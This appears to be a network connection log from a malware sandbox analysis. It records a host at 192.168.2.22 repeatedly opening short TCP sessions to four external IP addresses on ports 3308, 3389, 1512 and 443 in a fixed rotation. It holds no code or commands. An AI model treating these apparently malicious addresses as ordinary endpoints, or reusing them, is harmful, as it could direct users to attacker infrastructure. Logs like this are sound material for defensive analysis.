Jan 12, 2021 07:40:00.513366938 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.513611078 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:00.514410973 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:00.557482958 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.568408012 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.568437099 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.568495035 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:00.579575062 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:00.625102997 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.625240088 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:00.638417006 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:00.638771057 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:00.681838036 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.681957960 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:00.721537113 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.725059032 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.725080013 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.837626934 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.837651968 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.837821007 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:00.840804100 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:00.883847952 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:00.952498913 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.006311893 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.006386042 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.007164955 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.061064005 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.077105999 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.077131033 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.077194929 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.086544991 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.145447969 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.145539045 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.161937952 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.162096977 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.215750933 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.215912104 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.255109072 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.270155907 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.270178080 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.360876083 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.360901117 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.361048937 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.361105919 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.365257978 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:01.419048071 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:01.483489990 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.536355019 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.536770105 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.537650108 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.590470076 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.597316027 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.597359896 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.597448111 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.597484112 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.611155987 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.665215969 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.665478945 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.677939892 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.678122044 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.730941057 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.731177092 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.768769979 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.784104109 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.784153938 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.881747961 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.881798029 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.882044077 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.888288021 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:01.941129923 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:01.999207020 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.051536083 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:02.051685095 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.052328110 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.104276896 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:02.122035027 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:02.123070002 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.134550095 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.188678980 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:02.188829899 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.199790001 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.200109005 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.252903938 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:02.253068924 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.305051088 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:02.305170059 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:02.424748898 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:02.424767017 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:02.424818039 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.424849987 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.427208900 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:02.479283094 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:02.533118010 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.576329947 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.577147007 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.579449892 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.622380972 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.638254881 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.638278008 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.638361931 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.655004025 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.699871063 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.701448917 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.714032888 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.714080095 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.757116079 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.757307053 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.796089888 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.800386906 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.800416946 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.913125038 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.913156033 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:02.913470984 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.917475939 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:02.960506916 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:03.032594919 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.087389946 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.087479115 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.088339090 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.142402887 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.167706966 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.167735100 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.167831898 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.182334900 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.252237082 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.252432108 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.266673088 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.266940117 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.320194006 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.320417881 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.359859943 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.375577927 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.375608921 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.465996027 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.466033936 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.466274977 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.469429970 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:03.523183107 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:03.574479103 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:03.627360106 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:03.627438068 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:03.628334045 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:03.681325912 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:03.688249111 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:03.688282967 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:03.688373089 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:03.698472977 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:03.752398968 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:03.752573013 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:03.759428024 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:03.759635925 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:03.813951969 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:03.814132929 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:03.848622084 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:03.867013931 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:03.968127966 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:03.968168020 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:03.968398094 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:03.973453045 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:04.026704073 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:04.096738100 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.148583889 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:04.148732901 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.150218010 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.201847076 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:04.216496944 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:04.216607094 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.233690023 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.288033009 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:04.288211107 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.296163082 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.296298027 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.348098993 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:04.348328114 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.400144100 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:04.518681049 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:04.518711090 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:04.518932104 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.521888971 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:04.573611021 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:04.634712934 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:04.677823067 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.677947998 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:04.678607941 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:04.721571922 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.735032082 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.735064030 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.735105038 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:04.735138893 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:04.742180109 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:04.787009954 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.787127018 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:04.794229031 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:04.794447899 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:04.837434053 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.837641954 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:04.877959013 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.880593061 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.880757093 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.994134903 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.994159937 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:04.994493961 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:05.001142025 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:05.044209957 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:05.127732992 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.181746006 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.181858063 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.182811975 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.236649990 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.252446890 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.252495050 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.252587080 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.252631903 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.266477108 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.325294971 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.325506926 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.336077929 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.336226940 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.390135050 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.390363932 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.429070950 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.444231987 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.444257975 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.534710884 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.534744978 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.534953117 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.534992933 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.540781021 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:05.594281912 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:05.652791023 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:05.705845118 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:05.705945015 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:05.707417011 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:05.760363102 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:05.767317057 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:05.767335892 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:05.767409086 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:05.780858994 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:05.835036039 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:05.835303068 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:05.841481924 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:05.841710091 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:05.894593954 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:05.894788027 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:05.933024883 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:05.947700977 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:06.050991058 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:06.051040888 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:06.051208973 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:06.056775093 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:06.109776020 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:06.163582087 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.215261936 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:06.215398073 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.226120949 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.277658939 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:06.290813923 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:06.290904045 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.303699017 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.358601093 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:06.358773947 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.362854004 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.363013983 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.417728901 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:06.417941093 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.470355034 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:06.588073015 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:06.588099957 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:06.588263988 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.594162941 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:06.645699978 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:06.709450006 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:06.752585888 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:06.752686024 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:06.753318071 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:06.796315908 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:06.806955099 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:06.806981087 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:06.807075024 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:06.821640968 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:06.866976976 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:06.867203951 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:06.872945070 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:06.873193979 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:06.916137934 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:06.916281939 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:06.957022905 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:06.959207058 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:06.959223986 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:07.072221041 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:07.072254896 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:07.072334051 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:07.072385073 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:07.074837923 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:07.120034933 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:07.185106993 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.238862038 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.238974094 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.239789009 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.293232918 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.313184977 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.313215971 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.313271999 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.313872099 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.321713924 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.379385948 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.379626989 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.388860941 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.389036894 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.442521095 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.442755938 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.481754065 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.496304989 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.496325970 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.586543083 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.586596966 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.586816072 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.592273951 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:07.645788908 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:07.712028980 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:07.765058041 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:07.765157938 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:07.766227961 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:07.819118977 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:07.825911999 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:07.825936079 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:07.825999022 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:07.826107025 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:07.840464115 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:07.894512892 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:07.894717932 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:07.900325060 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:07.900563955 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:07.953577042 CET	1512	49194	46.105.131.65	192.168.2.22
